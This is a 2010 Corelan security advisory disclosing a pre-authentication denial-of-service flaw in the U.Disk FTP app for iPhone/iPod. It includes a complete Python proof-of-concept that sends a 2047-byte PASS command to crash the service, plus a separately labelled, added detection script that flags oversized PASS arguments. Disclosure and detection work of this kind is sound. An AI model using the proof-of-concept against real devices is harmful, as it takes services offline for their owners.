|------------------------------------------------------------------|
|                          Corelan Team                            |
|                                                                  |
|                    http://www.corelan.be:8800                    |
|                       security@corelan.be                        |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
|                                                                  |
|                 Vulnerability Disclosure Report                  |
|                                                                  |
|------------------------------------------------------------------|

Advisory          : CORELAN-10-003
Disclosure date   : 12th January 2010
Corelan reference : http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-003-udisk-v1-0-remote-dos/

0x00 : Vulnerability information
--------------------------------

[*] Product                     : Apple iPhone/iPod - Udisk FTP basic edition, remote pre-auth DoS vulnerability
[*] Version                     : 1.0
[*] Vendor                      : http://6tags.com
[*] URL                         : http://6tags.com/n/index.php/iphone/udisk/intro
[*] Type of vulnerability       : Remote DoS
[*] Risk rating                 : Medium
[*] Issue fixed in version      :
[*] Vulnerability discovered by : mr_me
[*] Greetings to                : corelanc0d3r, rick2600, ekse & MarkoT from Corelan Team

0x01 : Vendor description of software
-------------------------------------

From the vendor website:

  U.Disk is an easy-to-use application with a standard FTP server built in. With this feature, you can upload or download thousands of files with one click. Just use Copy & Paste to access files. Like your real U-Disk.

0x02 : Vulnerability details
----------------------------

Remote Denial of Service: when the application receives a password (PASS) command whose argument is 2047 characters long, the application crashes. Remote code execution may be possible.
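
A defender-side check for the condition described above (an added example, not part of the Corelan advisory or the U.Disk product): it splits a captured FTP control-channel stream into commands and flags any PASS argument that reaches a configurable length, using the 2047-byte crash length from the advisory as the reference value. The sample stream, the SAFE_PASS_LEN limit and the helper names are constructed for this example.

```python
import re

MAX_PASS_LEN = 2047   # PASS argument length that crashes U.Disk FTP 1.0 (from the advisory)
SAFE_PASS_LEN = 128   # hypothetical limit a filtering proxy or IDS rule might enforce

# Constructed sample of client->server FTP control-channel traffic (not a real capture).
SAMPLE_STREAM = (
    b"USER anonymous\r\n"
    b"PASS " + b"A" * MAX_PASS_LEN + b"\r\n"
    b"PWD\r\n"
    b"USER alice\r\n"
    b"PASS correct-horse\r\n"
)

# FTP command verbs are 3-4 letters, optionally followed by one space and an argument.
_CMD_RE = re.compile(rb"^([A-Za-z]{3,4})(?: (.*))?$")


def parse_ftp_commands(stream):
    """Yield (verb, argument) pairs from a CRLF-delimited FTP command stream.

    Lines that do not look like an FTP command are yielded with verb None so
    the caller can log them; nothing is silently dropped.
    """
    for line in stream.split(b"\r\n"):
        if not line:
            continue
        m = _CMD_RE.match(line)
        if m is None:
            yield None, line
        else:
            yield m.group(1).upper(), m.group(2) or b""


def find_oversized_pass(stream, limit=SAFE_PASS_LEN):
    """Return (command_index, length) for every PASS whose argument is >= limit.

    The index lets the caller correlate the hit with the preceding USER command.
    """
    return [
        (idx, len(arg))
        for idx, (verb, arg) in enumerate(parse_ftp_commands(stream))
        if verb == b"PASS" and len(arg) >= limit
    ]


if __name__ == "__main__":
    for idx, length in find_oversized_pass(SAMPLE_STREAM):
        print("command #%d: PASS argument of %d bytes (limit %d, crash length %d)"
              % (idx, length, SAFE_PASS_LEN, MAX_PASS_LEN))
```

The same check placed in front of the service (a filtering proxy rejecting PASS arguments above SAFE_PASS_LEN) would stop the crash-length input from ever reaching the vulnerable parser.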
0x03 : Vendor communication
---------------------------

[*] 3rd January 2010  : Vendor contacted
[*] 9th January 2010  : Vendor reminded of vulnerability
[*] 12th January 2010 : Public disclosure

0x04 : Exploit/PoC
------------------

#!/usr/bin/python
# Apple iPhone/iPod - Udisk FTP basic edition 1.0 remote DoS proof of concept
# (Python 2). Sends an FTP PASS command with a 2047-byte argument, which
# crashes the U.Disk FTP service listening on TCP port 8080.
import socket
import sys

print "[+] Apple Iphone/Ipod - Udisk FTP basic edition 0day Remote DOS exploit"

def Usage():
    print "Usage: ./udisk.py \n"
    print "Example: ./udisk.py 192.168.2.3\n"

if len(sys.argv) <> 2:
    Usage()
    sys.exit(1)
else:
    hostname = sys.argv[1]

username = "anonymous"
passwd = "\x41" * 2047            # 2047 bytes of 'A': the length that triggers the crash

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.connect((hostname, 8080))  # U.Disk serves FTP on port 8080, not 21
    print "[+] Connecting to the target.."
except socket.error:
    print "[-] Connection error!"
    sys.exit(1)

r = sock.recv(1024)                 # read the server banner
print "[+] Sending payload.."
sock.send("USER %s\r\n" % username)
sock.send("PASS %s\r\n" % passwd)
sock.send("PWD\r\n")
sock.close()
print "[+] Server is now DOS'ed ;)"
sys.exit(0)